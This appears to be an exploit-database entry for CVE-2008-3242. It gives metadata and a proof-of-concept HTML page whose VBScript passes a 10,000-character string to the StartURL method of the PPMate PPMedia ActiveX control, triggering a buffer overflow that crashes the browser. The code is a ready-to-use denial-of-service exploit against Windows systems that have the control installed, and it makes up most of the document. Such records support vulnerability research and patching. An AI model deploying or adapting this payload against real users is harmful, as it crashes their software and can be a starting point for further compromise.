[] NeoSense

PPMate PPMedia Class - ActiveX Control Buffer Overflow (PoC)

Author: Guido Landi
type: dos
platform: windows
port: 
date_added: 2008-07-16 
date_updated:  
verified: 1 
codes: OSVDB-47054;CVE-2008-3242 
tags: 
aliases:  
screenshot_url:  
application_url: 

<html>
<body>

<object id=target
classid=clsid:72B15B25-2EC8-4CDD-B284-C89A5F8E8D5F></object>
<script language=vbscript>

  arg1=String(10000, "A")
  target.StartURL(arg1)

</script>
</body>
</html>

# milw0rm.com [2008-07-17]